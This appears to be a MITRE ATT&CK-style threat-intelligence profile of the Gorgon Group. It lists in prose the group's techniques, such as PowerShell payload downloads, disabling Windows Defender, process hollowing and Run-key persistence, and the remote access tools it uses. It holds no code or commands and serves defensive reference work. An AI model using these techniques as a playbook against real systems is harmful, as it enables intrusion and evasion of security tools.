Gorgon Group

Gorgon Group is a threat group consisting of members who are suspected to be Pakistan-based or have other connections to Pakistan. The group has performed a mix of criminal and targeted attacks, including campaigns against government organizations in the United Kingdom, Spain, Russia, and the United States. [1]

ID: G0078
Version: 1.1

Techniques Used

EnterpriseT1059Command-Line InterfaceGorgon Group malware can use cmd.exe to download and execute payloads and to execute commands on the system.[1]
EnterpriseT1140Deobfuscate/Decode Files or InformationGorgon Group malware can decode contents from a payload that was Base64 encoded and write the contents to a file.[1]
EnterpriseT1089Disabling Security ToolsGorgon Group malware can attempt to disable security features in Microsoft Office and Windows Defender using the taskkill command.[1]
EnterpriseT1106Execution through APIGorgon Group malware can leverage the Windows API call, CreateProcessA(), for execution.[1]
EnterpriseT1112Modify RegistryGorgon Group malware can deactivate security mechanisms in Microsoft Office by editing several keys and values under HKCU\Software\Microsoft\Office\.[1]
EnterpriseT1086PowerShellGorgon Group malware can use PowerShell commands to download and execute a payload and open a decoy document on the victim’s machine.[1]
EnterpriseT1093Process HollowingGorgon Group malware can use process hollowing to inject one of its trojans into another process.[1]
EnterpriseT1055Process InjectionGorgon Group malware can download a remote access tool, ShiftyBug, and inject into another process.[1]
EnterpriseT1060Registry Run Keys / Startup FolderGorgon Group malware can create a .lnk file and add a Registry Run key to establish persistence.[1]
EnterpriseT1105Remote File CopyGorgon Group malware can download additional files from C2 servers.[1]
EnterpriseT1064ScriptingGorgon Group has used macros in Spearphishing Attachments as well as executed VBScripts on victim machines.[1]
EnterpriseT1023Shortcut ModificationGorgon Group malware can create a .lnk file and add a Registry Run key to establish persistence.[1]
EnterpriseT1193Spearphishing AttachmentGorgon Group sent emails to victims with malicious Microsoft Office documents attached.[1]
EnterpriseT1065Uncommonly Used PortGorgon Group has used a variant of ShiftyBug that communicates with its C2 server over port 6666.[1]
EnterpriseT1204User ExecutionGorgon Group attempted to get users to launch malicious Microsoft Office attachments delivered via spearphishing emails.[1]


S0336NanoCore[1]Audio Capture, Command-Line Interface, Disabling Security Tools, Input Capture, Modify Registry, Obfuscated Files or Information, Registry Run Keys / Startup Folder, Remote File Copy, Scripting, Standard Cryptographic Protocol, System Network Configuration Discovery, Uncommonly Used Port, Video Capture
S0262QuasarRAT[1]Code Signing, Command-Line Interface, Connection Proxy, Credential Dumping, Credentials in Files, Input Capture, Masquerading, Modify Registry, Remote Desktop Protocol, Remote File Copy, Scheduled Task, Standard Cryptographic Protocol, System Information Discovery, Video Capture
S0332Remcos[1]Audio Capture, Bypass User Account Control, Clipboard Data, Command-Line Interface, Connection Proxy, File and Directory Discovery, Input Capture, Modify Registry, Obfuscated Files or Information, Process Injection, Registry Run Keys / Startup Folder, Remote File Copy, Screen Capture, Scripting, Video Capture, Virtualization/Sandbox Evasion